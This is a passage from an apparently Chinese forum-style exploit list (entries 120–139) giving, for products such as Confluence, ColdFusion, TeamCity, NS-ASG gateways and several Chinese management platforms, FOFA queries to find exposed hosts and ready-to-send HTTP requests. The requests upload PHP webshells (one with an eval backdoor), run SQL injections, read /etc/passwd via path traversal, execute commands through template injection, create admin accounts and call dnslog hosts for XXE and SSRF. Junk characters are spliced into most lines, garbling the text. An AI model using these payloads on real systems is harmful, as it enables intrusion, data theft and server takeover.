/ c, ]: i7 t2 c5 w" i) y& s u7 u) t9 j
120. 北京百绰智能S40管理平台导入web.php任意文件上传" E. g8 d$ w" c! M$ D
CVE-2024-12539 {! V( V; ~, B3 g; K9 j* l$ l
FOFA:title="Smart管理平台"8 c, K# ~5 j* O; O+ ~5 Q4 i
POST /useratte/web.php? HTTP/1.1$ w5 K. q" [, {/ _8 q4 E' u
Host: ip:port
1 T; W) L Y: I4 U" ]: @7 T" fCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
6 T7 u( b6 ?' z% Z. G' ?* MUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, |. t' m+ R! x; v4 `3 W( j2 R- B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# d$ u& R- W/ f Q% l6 x! H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! e2 d3 k- l8 G* _0 qAccept-Encoding: gzip, deflate/ w1 d( M8 s# c# n+ p" e
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
1 K9 |- T" O- W; s1 b- ?0 ~( pContent-Length: 597* K! s( D+ S# M2 L& C
Origin: https://ip:port
1 p6 g4 r% p1 ]2 S5 g+ ]: i RReferer: https://ip:port/sysmanage/licence.php- s+ U1 Q0 E$ i# J' t/ X
Upgrade-Insecure-Requests: 14 S% V7 ^8 i+ ^5 o: `
Sec-Fetch-Dest: document
- w4 g" ~4 ~) K/ OSec-Fetch-Mode: navigate
& n* Z8 z3 q) _4 V" w+ mSec-Fetch-Site: same-origin* Z5 a: V% T, D$ K; Z3 V! c
Sec-Fetch-User: ?1
- m9 F1 Y' ~2 o9 d4 ^Te: trailers
7 f' [* d7 g, ~* P) K tConnection: close
1 s1 t% k6 t8 ]/ }
% ]9 m: J' j3 L-----------------------------42328904123665875270630079328
0 t" e, K# D$ t$ K: h; ]Content-Disposition: form-data; name="file_upload"; filename="2.php"
, w/ |7 R: |" F; c q8 rContent-Type: application/octet-stream' y7 Q1 Z. C. \% J& W- |# k: T7 T
$ T9 G3 |# G4 ~( p3 Q<?php phpinfo()?>
. ?3 H" d$ `% i5 W/ R( g3 N" g-----------------------------42328904123665875270630079328; r x" [' J3 O) C$ q+ ~& t5 b
Content-Disposition: form-data; name="id_type"
1 b2 w `. W" k/ ]
) X, _" c/ h! }3 U$ p1& F" b8 Z. F2 c% {: M
-----------------------------42328904123665875270630079328
! ]; h# E; i5 t; P# aContent-Disposition: form-data; name="1_ck"
; m! H* }5 W/ |$ h/ A1 k! O. M4 b: t+ O: u8 I! [, u: v
1_radhttp
' j. d! |2 w) t/ h+ G-----------------------------42328904123665875270630079328
' C, p# H' G1 x* [9 }Content-Disposition: form-data; name="mode"8 `; V) W! d; h2 ^
4 L1 E& k: \0 Pimport
8 C/ ~' j( ] E. Z4 q# V6 X$ A7 L-----------------------------42328904123665875270630079328
# P: w3 _2 t, g5 Z V! \; \0 L" H3 b2 K# C- X
m4 Z3 m# G4 U6 K文件路径/upload/2.php
$ I- Z! B1 w" \
% O: P( c0 v; q$ P2 b3 b/ |121. 北京百绰智能S42管理平台userattestation.php任意文件上传4 F( e: q" Y$ D0 B6 Y: s6 x+ W0 B* M
CVE-2024-1918
1 n. R% u! P: o+ H8 Z w6 p+ kFOFA:title="Smart管理平台"
5 H% I5 p5 t0 \% r) F; |/ m, T) SPOST /useratte/userattestation.php HTTP/1.1, W& x$ z$ ^9 _: H$ a- _, p' C) a
Host: 192.168.40.130:8443
' v7 |/ ~( |: Y& E1 m) pCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac508 `0 M3 C7 M6 e5 {8 t. K& R/ k
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko% q, m3 j, ~$ S" Z9 G* E& m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; t3 O1 A8 k4 [4 a% PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' r5 N/ v v% c0 jAccept-Encoding: gzip, deflate
2 v, b4 Y: L6 s5 X% w& f6 e i. I. pContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793286 ]2 j6 K* g: i" l# ^6 F
Content-Length: 592
R( N, r+ {6 q( W+ X0 T4 ]Origin: https://192.168.40.130:8443
' e4 ]6 U, t+ X0 u# p; @Upgrade-Insecure-Requests: 18 E' v% N, S7 S4 `/ Z' C
Sec-Fetch-Dest: document
: Q4 h6 k& `1 c" B+ ~" S! pSec-Fetch-Mode: navigate' @- o' U7 u4 X' S5 o/ }
Sec-Fetch-Site: same-origin
}; X+ p4 D' `: w' v; p8 ~& l ?: \# XSec-Fetch-User: ?1
, y/ |/ v' [4 N! |Te: trailers( c; a% F9 ~7 R/ I* @
Connection: close
/ x- m3 @, m+ V3 \
- I3 b2 t! o; c* a- b- U) f-----------------------------423289041236658752706300793288 x& x* ?) B% c2 J; M$ U
Content-Disposition: form-data; name="web_img"; filename="1.php"3 C3 Y3 t: @! W
Content-Type: application/octet-stream) W# q5 P3 [2 g- V5 u4 y
6 n2 x- \( H' r; R, T; t, g6 N; c% z<?php phpinfo();?>
7 g8 v! J2 w7 K& s3 n% X-----------------------------42328904123665875270630079328
4 A$ C6 W; [. S; _! P4 X% v8 lContent-Disposition: form-data; name="id_type"
% \2 f! Y7 o1 d* c5 D* X
7 q/ t* p. p1 e, m) K( W1
) K0 r7 C& g# }% V/ ?-----------------------------42328904123665875270630079328, F! H( D2 n% ]1 U3 A/ H* v
Content-Disposition: form-data; name="1_ck"
% l- ]5 ?( U- C) j! [1 S# c+ V# x f% U$ U3 K
1_radhttp
. q8 o% L% c2 q-----------------------------42328904123665875270630079328
" K1 K4 x2 a7 y! _) Y* EContent-Disposition: form-data; name="hidwel"
- U2 V2 B$ d( b0 l+ ~) I- D
6 ~# P* u _) g, wset
R3 g) ]7 u2 k6 V3 G& l9 b3 o-----------------------------423289041236658752706300793280 G& G/ {: W6 S4 [) k
, ~) \; c7 V, `, s
2 P4 L: x* H I& S: c! m3 V. [boot/web/upload/weblogo/1.php
2 S5 x7 G( c0 X6 x
' p4 P! s! b3 c3 t" s122. 北京百绰智能s200管理平台/importexport.php sql注入
* `4 `8 N1 H; h+ yCVE-2024-27718FOFA:title="Smart管理平台"3 w/ Y1 O9 W! ~ S
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()3 ~) I- h- M7 w( ^. g
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
- H# M- @) H& c! bHost: x.x.x.x
, K2 U5 I- @2 vCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc09 L/ A: {$ M6 p1 m7 X5 l+ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ x' [% d& H; o1 \& O& T! }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ O9 O# ~. v) q) m5 a. ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 [* D# x4 D* b" j' ^5 y
Accept-Encoding: gzip, deflate, br. ~: A; g, z) s8 K% r& i+ |8 c
Upgrade-Insecure-Requests: 18 C) |( @( f/ A* Q, {' y i. S
Sec-Fetch-Dest: document7 @7 Q: g4 S7 p/ @$ B6 z
Sec-Fetch-Mode: navigate. M. J: Z- {6 h3 _
Sec-Fetch-Site: none$ n7 d" J; _( O- r
Sec-Fetch-User: ?10 T( i/ l/ o: p; ]. G% L* i7 c
Te: trailers7 {/ c8 V/ t# o
Connection: close
, } H5 ], p* ?; _
4 L9 T. m+ [4 A9 b9 Z- L
' s3 |8 R; Z: v' b# B123. Atlassian Confluence 模板注入代码执行
3 m8 X. X, U3 r$ rFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
( Q) \/ n3 V' a( K1 A% VPOST /template/aui/text-inline.vm HTTP/1.1
+ W$ v& z5 B$ P( nHost: localhost:8090+ {+ M2 Y" N F: I2 |
Accept-Encoding: gzip, deflate, br
8 [/ J( k6 n4 @+ i6 q/ eAccept: */*
( K9 r! x6 v- O3 o+ UAccept-Language: en-US;q=0.9,en;q=0.82 p# X- m3 V# p1 `" w& } U% s( T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 t9 x4 U4 \: V7 J5 C ~$ S$ b
Connection: close5 f+ R' J% J( `0 E) U+ h% g/ s2 i
Content-Type: application/x-www-form-urlencoded
; [% x! w1 }6 G1 O8 }1 F8 x( [0 r$ _* `: N$ p3 r8 @$ n
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
% }* F" W! c3 C$ e/ a* Y- T: l4 n- E/ z" f4 J5 X) c) [* q
C# J$ o0 l/ c* Y4 P
124. 湖南建研工程质量检测系统任意文件上传
! q( d8 [. j. s" k; JFOFA:body="/Content/Theme/Standard/webSite/login.css"
9 F* Z4 k- E2 D" O- Z) `POST /Scripts/admintool?type=updatefile HTTP/1.1
0 a: k" l0 B0 q8 a' ^$ `9 m- D zHost: 192.168.40.130:8282, O- `0 f, W. r% }" c
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# x, ^& _# f- W8 oContent-Length: 72/ l! l. A5 m {. D( \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8- P% z/ J( M; d5 [! N
Accept-Encoding: gzip, deflate, br! B) E& F7 _" ~: n0 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. U/ o' m, l' a
Connection: close
0 k& |9 u) m4 gContent-Type: application/x-www-form-urlencoded
3 v6 Q( Z7 w1 S
6 e; [5 w. I! T6 `0 j, [filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
`* _* v. F; w$ L& s- `# K7 F% S( a% `" Z2 \6 ~! b4 B# S
9 x0 x" R; u. E. \
http://192.168.40.130:8282/Scripts/abcgcg.aspx2 D9 s. ]& }8 @8 B
. Z6 G! _$ o! r8 c' B
125. ConnectWise ScreenConnect身份验证绕过
3 X6 r; A3 C2 r3 m1 r8 Q6 h3 YCVE-2024-1709% |: ?0 ?1 [( @3 v3 ~- F6 ~! Q
FOFA:icon_hash="-82958153"+ p% c I6 y$ i$ d3 g G8 E
https://github.com/watchtowrlabs ... bypass-add-user-poc
@5 e) ^+ M! j5 _7 }0 J' N! K0 S) b9 \$ C& h
! s( i) e+ s- ^, h5 e7 b使用方法! |7 X0 u6 x& r
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!% }$ e, S. P5 _- V
6 S% g$ N( o7 H# r& f+ v. M4 U* G4 J* k1 f
创建好用户后直接登录后台,可以执行系统命令。
5 M' B: f1 y, h5 k, F# A% y
! H% _) ]- o3 g% Q: U126. Aiohttp 路径遍历
$ p4 p+ n3 Y9 K9 o5 Q; l% sFOFA:title=="ComfyUI"
* O6 J; E1 J; [6 j1 ]GET /static/../../../../../etc/passwd HTTP/1.1
$ I5 Y: {# P9 F. y7 I/ \Host: x.x.x.x, [7 J' L; V$ E% V1 Q! d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 v0 l! |* n" x) l
Connection: close
0 A( j' G: V0 z0 q% ^Accept: */*$ n0 h7 @$ u) R$ ^) n8 f
Accept-Language: en
2 K A) J5 A- I5 p1 u1 ?3 ~Accept-Encoding: gzip
' Z" A. i. e. g' |4 ^ {3 @' c. W3 J" I0 C2 G8 \
6 }5 ~+ }8 s+ n
127. 广联达Linkworks DataExchange.ashx XXE& K0 {+ q6 Y' K2 a! g( P' p$ X- c0 J
FOFA:body="Services/Identification/login.ashx"
5 M* _# l4 \* H7 LPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.19 q8 X" V0 S* j, z3 E
Host: 192.168.40.130:8888 c/ i/ Y9 m. u$ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.367 J5 u8 Y. t1 g8 Q
Content-Length: 415
1 ^* N5 \# n1 U2 c# w, jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* w9 J2 E& d5 K) o3 p, M$ A% s. ^3 R
Accept-Encoding: gzip, deflate
6 p' V; K e; n0 i V! aAccept-Language: zh-CN,zh;q=0.91 h( p6 S# E( k: Q* I5 _+ N% ~
Connection: close
4 ]" w' N" {+ M2 q2 ^4 fContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe06 W Z1 S3 f& |; J! E& {+ i& w: A
Purpose: prefetch9 ~$ P* Z( r! H3 \" O
Sec-Purpose: prefetch;prerender
. r& H" h v s! Y. y7 Q8 j+ E- \) }5 M! U
------WebKitFormBoundaryJGgV5l5ta05yAIe0
( m& \& ~: A$ h, wContent-Disposition: form-data;name="SystemName"
/ \; F; q8 [) J% n- b( `9 [% d/ x: F: J' K
BIM
: y* z1 R: Z, W8 @/ o# c* w9 c: Z------WebKitFormBoundaryJGgV5l5ta05yAIe0, E! Q9 v1 I7 I! {6 v
Content-Disposition: form-data;name="Params"
4 U/ d! Z; _& X* B6 G- MContent-Type: text/plain
8 `) X- u& ` P8 M' d
; @0 F, S6 t3 |) ] J2 }, f<?xml version="1.0" encoding="UTF-8"?>
, r# y) o' v! B8 p<!DOCTYPE test [
! E/ V+ T, p K<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">, q1 o9 S& m4 B. g+ v
]
( ]3 I3 u1 [2 @6 D( x>; Q% F8 ^0 d/ p% W6 y6 V2 Z2 M9 R* |
<test>&t;</test>
$ E4 ^, p8 \ E+ a+ w( C; |6 n------WebKitFormBoundaryJGgV5l5ta05yAIe0--+ I( O- w4 Z) V4 {9 w
3 |& u4 x* Y7 U; U
4 b( D) \! b1 \' `3 ^+ N1 O, z# [& Q) N
128. Adobe ColdFusion 反序列化8 ~. u! w8 ?, ^8 q
CVE-2023-38203
4 f J2 F9 {5 F6 EAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
' b! G4 _' \' B; j6 FFOFA:app="Adobe-ColdFusion", r5 E _: e1 {+ I7 A
PAYLOAD* F5 h+ w; b% S
) s3 Q+ [" @' \( p6 ~0 D
129. Adobe ColdFusion 任意文件读取6 H3 S7 p' E) z5 ~2 I
CVE-2024-20767
8 Z8 l$ S" V3 C; j& d- R! sFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
/ N+ u! l# \# b; v! S8 y6 B第一步,获取uuid
1 q1 C* l& Y e' o5 jGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.16 C2 V' Y. x5 ]8 W! H" s
Host: x.x.x.x
- Z I3 W) G/ @% m" TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 u; {) I# @; hAccept: */*
" ]7 ]% u% P& [9 r: J) EAccept-Encoding: gzip, deflate
; j9 ^4 O8 K9 Y, iConnection: close) ^/ ~0 p% ^0 Q/ y- [# }
4 u% T. G; n: g( g! Q. s( w
3 {8 U! n+ W( N. s( |/ H# T) X: @* r第二步,读取/etc/passwd文件8 f: m/ x% s! v U/ L. k
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" z9 @2 Q# R/ Q) n$ t" l
Host: x.x.x.x+ u7 t) U8 G+ h4 s$ p) G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.367 i0 d s7 A, L1 W; y$ f
Accept: */*
9 n2 b& \. t0 S+ z: C1 b; W9 l. wAccept-Encoding: gzip, deflate$ x# b9 R- [* {7 T" R, C" D6 A* v2 r
Connection: close) L- P4 R. w4 F! C: g9 v, ]: m
uuid: 85f60018-a654-4410-a783-f81cbd5000b9- v, i: b$ v$ d4 n
& X2 d4 F6 W1 q
( J$ y; v# t. E: [, b130. Laykefu客服系统任意文件上传* m$ s$ K* r+ e2 R
FOFA:icon_hash="-334624619"
/ e" d/ e! _2 C. L8 UPOST /admin/users/upavatar.html HTTP/1.1
6 a* v! m' @3 }3 V* n" p( }Host: 127.0.0.1
+ h/ _* U- F8 J: f! bAccept: application/json, text/javascript, */*; q=0.01
' s M5 E- d" B* A- wX-Requested-With: XMLHttpRequest0 ^* `4 z' t, T0 p% V% Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
7 o: w; B# ]3 E, xContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
# I( G6 `; ?9 O/ I) a* aAccept-Encoding: gzip, deflate
j' }8 u' Q% j6 L, ZAccept-Language: zh-CN,zh;q=0.9
) D. k! A q( I! J% _2 _Cookie: user_name=1; user_id=3
+ G4 z! S3 Q, jConnection: close9 B* |: g( B( Z6 `% F" h# a4 U6 G
, P! W+ m& J7 u- i, m6 R: w
------WebKitFormBoundary3OCVBiwBVsNuB2kR& o6 H! B. l4 |8 y9 e- B& M
Content-Disposition: form-data; name="file"; filename="1.php"" T* i: D- F' u5 g( _0 Y- x& _
Content-Type: image/png
0 z0 d) l% o& }
/ E7 k- s( A# C<?php phpinfo();@eval($_POST['sec']);?>) H3 g: ?8 I, [& W b
------WebKitFormBoundary3OCVBiwBVsNuB2kR--: Q# w: n9 I+ ?, h
& X% f4 | ^5 X3 u3 l% k% h
2 [0 e: J6 k6 C, j8 s% ^
131. Mini-Tmall <=20231017 SQL注入
6 ^9 @ Q4 J: R$ M& W8 s3 F- GFOFA:icon_hash="-2087517259"
( ~. ~2 `4 V, P+ c# V后台地址:http://localhost:8080/tmall/admin) e3 X2 i; G- g/ G
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)7 J4 H3 J+ u( q( U2 U
6 P6 u) N7 C& V2 n3 M0 k132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 B) ?5 z& k$ w) `9 u
CVE-2024-27198
5 a8 m2 U/ K% f* ?+ v; WFOFA:body="Log in to TeamCity"
7 b8 S5 T- h' U q. zPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1: w$ K! H. B$ H( `2 P% M
Host: 192.168.40.130:8111
8 d8 N7 {' i. u8 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: n6 o6 b- ~! j0 `- ]8 E6 xAccept: */*
) n5 _1 }9 M* R ]+ \' dContent-Type: application/json
/ P8 m8 `; f( L: L) b4 N$ L1 L" ?Accept-Encoding: gzip, deflate4 B9 l) v* B$ B7 [
+ c; _- V! e% i! u
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# s" ?& H: Y' p
8 [& b ^! n7 j" L9 K- S5 X! m# B s* h' P+ {5 }
CVE-2024-27199% k* t9 g: R* I+ D, {
/res/../admin/diagnostic.jsp4 b& v U1 _9 h
/.well-known/acme-challenge/../../admin/diagnostic.jsp
$ t0 e: P* }( e7 F/ ?* r( j/update/../admin/diagnostic.jsp* A$ B! r& c8 \0 D5 L& L
1 r/ t3 P& e$ z& Y' r1 A, |1 Q
6 T& X+ D2 H4 h: @& X5 A1 `% b- y
CVE-2024-27198-RCE.py
. p" n) C- V6 R' {* s' M# v+ A7 i7 c5 x
133. H5 云商城 file.php 文件上传
7 j2 \1 ]+ v8 @) F9 o, [FOFA:body="/public/qbsp.php"
' G3 K# P- y* c8 }POST /admin/commodtiy/file.php?upload=1 HTTP/1.11 Q0 \. _- Q# W& z! V: p$ X: ^& H
Host: your-ip
9 X2 d9 L; _. P% JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, }" P! F' }7 U1 o" y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx$ h5 E$ b+ s% Y
& W4 a( f% n/ g8 ~
------WebKitFormBoundaryFQqYtrIWb8iBxUCx8 ]; J0 k2 ^9 P% }
Content-Disposition: form-data; name="file"; filename="rce.php"+ O8 q7 v0 z2 O/ J. |, P
Content-Type: application/octet-stream
- u! _6 f5 E0 l& W5 e6 Z " Y4 k" D2 y7 k, |' A! R: M% V
<?php system("cat /etc/passwd");unlink(__FILE__);?>
5 v- ~' B1 S( N7 D: Y2 r------WebKitFormBoundaryFQqYtrIWb8iBxUCx--5 H( n' c1 b( d& u3 s& X0 O
- D: c2 s) W$ R R1 Q. [
) {' D. K6 E0 ]* p
( E0 a# G3 B+ T4 ?8 u) x134. 网康NS-ASG应用安全网关index.php sql注入0 U6 J. m; W0 e+ Z0 n# C
CVE-2024-2330
( a' j" x- B& W! P% Y6 m1 N9 yNetentsec NS-ASG Application Security Gateway 6.3版本
, L8 G4 L5 D3 t1 [5 V. d( B4 tFOFA:app="网康科技-NS-ASG安全网关"" x3 b' }* r+ x8 h
POST /protocol/index.php HTTP/1.1
6 V5 V, w. ^3 YHost: x.x.x.x* e6 W' f3 g- G9 I( O0 M7 N
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de4 u; i0 Y" @5 N' H# Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
, S' w! [/ ]4 \Accept: */*
& Y) V; ^7 s/ n" AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" T& ?# B' x' b; T5 t4 hAccept-Encoding: gzip, deflate. y. e4 I5 J2 @
Sec-Fetch-Dest: empty
8 c# a5 _( x' o# L3 LSec-Fetch-Mode: cors1 R! P, x# L. z3 g' F) G+ p* l( O* K
Sec-Fetch-Site: same-origin# {" @2 O9 r" Z1 N! g
Te: trailers, j) w$ F; M3 e: I! l- m) G3 r- P
Connection: close8 Y5 b6 _4 f/ `! m
Content-Type: application/x-www-form-urlencoded
$ B3 S! C9 ~" i6 @# y6 v$ WContent-Length: 2632 \$ i8 p6 B9 O) r# i# c. Y! C; o
- u- |1 `9 ]8 P9 Y( Hjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
$ `3 N1 C% r t/ c0 P* F
5 @+ T: U: z; f+ R3 S* z2 Z5 N S9 z
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入4 f F0 ]7 `4 F$ s3 v
CVE-2024-2022
$ w. m/ d. E9 J, mNetentsec NS-ASG Application Security Gateway 6.3版本
8 q6 `% } X, V$ Q, B% N& ^FOFA:app="网康科技-NS-ASG安全网关"( g+ j# d/ `1 N* `* P9 r
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
" ]( C& J9 o. @- X, I7 oHost: x.x.x.x
. i; T' B3 o+ q2 \; n/ ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& y8 H& E+ M! O( ~ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ r# X* p8 x1 t+ ^& bAccept-Encoding: gzip, deflate
1 J7 D# H3 x0 z2 W% {, oAccept-Language: zh-CN,zh;q=0.9
; G a' Z- \, s0 Y" g7 YConnection: close% T; y4 w7 o* j( B$ O
4 U h8 s4 h* H s* o( D
- R9 U$ K+ X0 D4 M5 a9 }' @136. NextChat cors SSRF' d* Y5 Y+ s5 g
CVE-2023-49785
& w4 S- i6 k6 E; W7 b# q/ lFOFA:title="NextChat"
1 k" Y* ~/ p, F) y' T0 P6 Z4 oGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
$ Q+ e1 b8 D: r; oHost: x.x.x.x:10000: |$ v+ |; K2 y7 Q c5 x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 N9 x' I1 m( P, \* ^: ]) \
Connection: close! m: l8 H; i/ _4 |2 h2 [+ G
Accept: */*
* H# s! L1 K8 P3 O2 V1 m% XAccept-Language: en! f/ N: Q& Q% B; Y3 K
Accept-Encoding: gzip
- A% K* R! J0 E$ p) P6 G5 h, Z5 P& i7 X, ?5 ^; V" G
& G' A& Y, E! A; u, i" U' D137. 福建科立迅通信指挥调度平台down_file.php sql注入% v9 [9 V4 ~$ L5 I [
CVE-2024-2620
' k, [% `# i- e, [9 PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" x: e: Z- m5 q" U
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
- `+ A: ]- S2 H+ b& I- nHost: x.x.x.x$ B( C8 N$ V& B# V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# s) o% o3 y/ ?& X7 X* D: j5 ?' i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- U0 d- a+ L8 AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 C* D P) O1 E- W
Accept-Encoding: gzip, deflate, br8 A& }: C6 T7 x1 b
Connection: close' [! R7 d; U+ m7 L4 S+ `) q
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
1 N' V3 S- O9 r$ p4 Y; XUpgrade-Insecure-Requests: 16 C# P B# J) e/ c0 D
" Z V. U; f5 @* V
" G q1 M; O" u+ E: |138. 福建科立讯通信指挥调度平台pwd_update.php sql注入" l- u6 r$ R5 p! L; m
CVE-2024-2621
8 Z' @ H3 k# OFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
* ?3 W `8 @$ j0 c5 Z) SGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
% W3 |! a0 l; G9 }3 a' v4 i/ o }Host: x.x.x.x
. i( t, ^0 h! L! O5 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 }& q) e! r4 n9 H6 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& D$ D. y5 `- m, tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, L+ W1 i: x5 t: t
Accept-Encoding: gzip, deflate, br$ K' w/ n, ~( ?' T( E+ z! L+ n
Connection: close
* Z/ U& r2 M( AUpgrade-Insecure-Requests: 1
/ Y& ~+ l6 O! ?. o
a; F7 h! m+ h0 V+ h( j; r+ ]* e0 C2 g: W6 g- X9 Z0 k
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
_1 K5 I( T- @0 H6 D" _CVE-2024-26224 r9 z L! J6 r' \3 C# I
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 A# o) O1 o8 V+ jGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.17 |( c4 d1 u; K# ?3 N
Host: x.x.x.x$ Y2 o7 s% G3 B/ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. V7 d# |9 N4 Q2 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
